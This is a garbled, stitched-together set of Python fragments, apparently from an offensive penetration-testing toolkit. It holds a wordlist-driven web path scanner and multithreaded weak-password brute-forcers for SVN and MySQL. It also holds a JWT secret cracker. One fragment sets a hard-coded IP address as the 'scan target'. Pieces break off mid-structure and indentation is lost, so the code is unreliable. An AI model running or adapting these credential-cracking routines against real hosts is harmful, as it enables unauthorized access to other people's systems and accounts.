def scan_file_plus(self):
file_payload = [
self.url + formatPath(i.strip())
for i in readFile(self.wordsList_plus)
]
fileScanProcess = MyThreadPool(self.scan, file_payload,
self.maxconnections)
fileScanProcess.start()
def scan_path(self):
path_payload = [
self.url + formatPath(i.strip())
for i in readFile(self.cachePath_txt)
]
pathScanProcess = MyThreadPool(self.scan, path_payload,
self.maxconnections)
pathScanProcess.start()
def weakPwdCrack_Svn(ip, user_list=None, pwd_list=None, resultFile=None):
if resultFile == None:
resultFile = '{}result/{}_{}.txt'.format(base_root, ip, time.time())
if user_list == None:
user_list = readFile(
'{}payload/dict/user_database.txt'.format(base_root))
if pwd_list == None:
pwd_list = readFile(
'{}payload/dict/passwd_top10.txt'.format(base_root))
#生成在多线程里使用的关键函数
def connectSvn_forThread(passwd, otherArgs):
ip = otherArgs['ip']
user = otherArgs['user']
passwd = passwd.strip()
print('crack user:[{}]/pwd:[{}]'.format(user, passwd))
(flag, userAndpwd) = connect_svn(ip, user, password=passwd)
if flag:
print('[FOUND] user:[{}]/pwd:[{}],result out is [{}]'.format(
user, passwd, userAndpwd))
time.sleep(1.5) # 多线程写入文件时,可能存在条件竞争,添加睡眠时间尽可能防止其出现
writeFile(resultFile,
'[user:[{}]/pwd:[{}]\r\n'.format(user, passwd))
time.sleep(1.5) # 多线程写入文件时,可能存在条件竞争,添加睡眠时间尽可能防止其出现
#爆破和用户名相似的密码
for user in user_list:
user = user.strip()
userNameAlikePwd = getUserNameAlikePwd(user)
otherArgs = {'ip': ip, 'user': user}
crackFtpThread = MyThreadPool(connectSvn_forThread,
userNameAlikePwd,
other_args=otherArgs)
crackFtpThread.start()
# 爆破字典里面的密码
for user in user_list:
user = user.strip()
otherArgs = {'ip': ip, 'user': user}
crackFtpThread = MyThreadPool(connectSvn_forThread,
pwd_list,
other_args=otherArgs)
crackFtpThread.start()
def weakPwdCrack_jwt(token, code='ascii', key_list=None, resultFile=None):
if key_list == None:
key_list = readFile('{}payload/dict/passwd_1w.txt'.format(base_root))
if resultFile == None:
resultFile = '{}result/jwt_{}.txt'.format(base_root, time.time())
myProcess = MyProcessPool(jwtCrack, key_list, other_args=token)
myProcess.start()
writeFile(resultFile, '[FOUND] key:{}'.format(myProcess.result))
def getWeb(ip_port_list=None,targetFile=None,resultFile=None):
if targetFile:
ip_port_list = readFile(targetFile)
if resultFile == None:
resultFile = '{}result/web_{}.txt'.format(base_root,time.time())
getWebThread = MyThreadPool(isWeb,ip_port_list)
getWebThread.start()
writeFile(resultFile,'{}'.format(getWebThread.result))
def creatCachePathPayload(self):
self.clearCacheTxt()
extensionList = self.getExtensionList()
#创建path缓存文件
try:
for fileName in readFile(self.wordsFile):
writeFile(self.cachePath_txt, '{}\n'.format(fileName.strip()))
for fileName in self.keyWords:
writeFile(self.cachePath_txt, '{}\n'.format(fileName))
except Exception as e:
print(e)
pass
#创建file缓存文件
try:
for fileName in readFile(self.wordsFile):
for exten in extensionList:
writeFile(
self.cacheFile_txt,
'{}.{}\n'.format(fileName.strip(), exten.strip()))
for fileName in self.keyWords:
for exten in extensionList:
writeFile(
self.cacheFile_txt,
'{}.{}\n'.format(fileName.strip(), exten.strip()))
except Exception as e:
print(e)
pass
getRemoveDupFile(self.cachePath_txt)
getRemoveDupFile(self.cacheFile_txt)
self.clearCacheTxt()
os.system('mv {} {}'.format(self.cachePath_txt + '.rd',
self.cachePath_txt))
os.system('mv {} {}'.format(self.cacheFile_txt + '.rd',
self.cacheFile_txt))
'port': port,
'database': database
}
crackFtpThread = MyThreadPool(connectMysql_forThread,
userNameAlikePwd,
other_args=otherArgs)
crackFtpThread.start()
# 爆破字典里面的密码
for user in user_list:
user = user.strip()
otherArgs = {
'ip': ip,
'user': user,
'port': port,
'database': database
}
crackFtpThread = MyThreadPool(connectMysql_forThread,
pwd_list,
other_args=otherArgs)
crackFtpThread.start()
if __name__ == '__main__':
last_time = time.time()
# pwd_list = readFile('{}payload/dict/passwd_1w.txt'.format(base_root))
pwd_list = readFile('{}payload/dict/passwd_top10.txt'.format(base_root))
ip = '167.88.178.54' # 扫描目标
weakPwdCrack_mysql(ip, pwd_list=pwd_list)
print('total time is {}'.format(time.time() - last_time))
def file_dedu(target_file, result_file):
test = readFile(target_file)
test = deduplication_list(test)
for i in test:
writeFile(result_file, i)